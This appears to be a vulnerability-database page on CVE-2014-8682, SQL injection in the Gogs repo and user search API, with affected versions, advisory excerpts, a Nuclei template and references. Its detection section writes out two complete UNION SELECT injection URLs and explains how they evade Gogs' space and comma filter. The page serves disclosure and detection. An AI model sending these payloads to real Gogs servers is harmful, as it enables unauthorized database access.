CVE-2014-8682
published 2014-11-21CVE-2014-8682: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary…
PriorityP263high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
34.27%
98.2th percentile
Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gogits | gogs | <= 0.5.5 | — |
| gogits | gogs | — | — |
| gogits | gogs | — | — |
| gogits | gogs | — | — |
| gogits | gogs | — | — |
| gogits | gogs | — | — |
| gogs.io | gogs | >= 0.3.1 < 0.5.8 | 0.5.8 |
Detection & IOCsextracted from sources · hover to see the quote
url/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27↗
url/api/v1/users/search?q='/**/and/**/false)/**/union/**/select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/mysql.db/**/where/**/('%25'%3D'↗
- →Successful exploitation of the /api/v1/repos/search endpoint returns a JSON response body containing all three of the strings '"ok":true', '"data"', and '"repolink":"' simultaneously with HTTP 200. ↗
- →The SQL injection payload uses tab characters (0x09 / %09) as whitespace substitutes instead of spaces (0x20), because the FilterSQLInject function strips spaces. Detection rules should look for tab-delimited UNION SELECT patterns in the q parameter. ↗
- →The /api/v1/users/search PoC uses /**/ comment blocks as whitespace substitutes in the q parameter to bypass the space filter; monitor for comment-delimited UNION SELECT patterns in requests to this endpoint. ↗
- ·The SQL injection is only exploitable on Gogs versions >= v0.3.1-9-g49dc57e through 0.5.x before 0.5.6.1105 Beta; versions from 0.5.6.1105 onward use prepared statements and are not vulnerable. ↗
- ·Starting from v0.5.6.1025-g83283b, commas are also filtered by FilterSQLInject in addition to spaces, requiring attackers to use JOIN-based UNION payloads instead of comma-separated column lists. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
SQL Injection in Gogs in gogs.io/gogs
osv·2024-08-21
CVE-2014-8682 SQL Injection in Gogs in gogs.io/gogs
SQL Injection in Gogs in gogs.io/gogs
SQL Injection in Gogs in gogs.io/gogs
GHSA
SQL Injection in Gogs
ghsa·2021-06-29
CVE-2014-8682 [HIGH] CWE-89 SQL Injection in Gogs
SQL Injection in Gogs
Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
OSV
SQL Injection in Gogs
osv·2021-06-29
CVE-2014-8682 [HIGH] SQL Injection in Gogs
SQL Injection in Gogs
Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
No detection rules found.
Exploit-DB
Gogs - 'users'/'repos' '?q' SQL Injection
exploitdb·2014-11-14·CVSS 7.5
CVE-2014-8682 [HIGH] Gogs - 'users'/'repos' '?q' SQL Injection
Gogs - 'users'/'repos' '?q' SQL Injection
---
Unauthenticated SQL Injection in Gogs repository search
Researcher: Timo Schmid
Description
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
from [1])
It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
unauthorized users.
Gogs provides an api view to give javascript code the possibility to
search for
existing repositories in the system. This view is accessible at
/api/v1/repos/search?q=.
The q Parameter of this view is vulnerable to SQL injection.
Exploitation Technique
Remote
Severity Level
Critical
CVSS Base Score
8.
Nuclei
Gogs (Go Git Service) - SQL Injection
nuclei·CVSS 7.5
CVE-2014-8682 [HIGH] Gogs (Go Git Service) - SQL Injection
Gogs (Go Git Service) - SQL Injection
Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
Template:
id: CVE-2014-8682
info:
name: Gogs (Go Git Service) - SQL Injection
author: dhiyaneshDK,daffainfo
severity: high
description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/
http://gogs.io/docs/intro/change_log.htmlhttp://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.htmlhttp://seclists.org/fulldisclosure/2014/Nov/33http://www.exploit-db.com/exploits/35238http://www.securityfocus.com/archive/1/533995/100/0/threadedhttp://www.securityfocus.com/bid/71187https://exchange.xforce.ibmcloud.com/vulnerabilities/98694https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8dhttp://gogs.io/docs/intro/change_log.htmlhttp://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.htmlhttp://seclists.org/fulldisclosure/2014/Nov/33http://www.exploit-db.com/exploits/35238http://www.securityfocus.com/archive/1/533995/100/0/threadedhttp://www.securityfocus.com/bid/71187https://exchange.xforce.ibmcloud.com/vulnerabilities/98694https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
2014-11-21
Published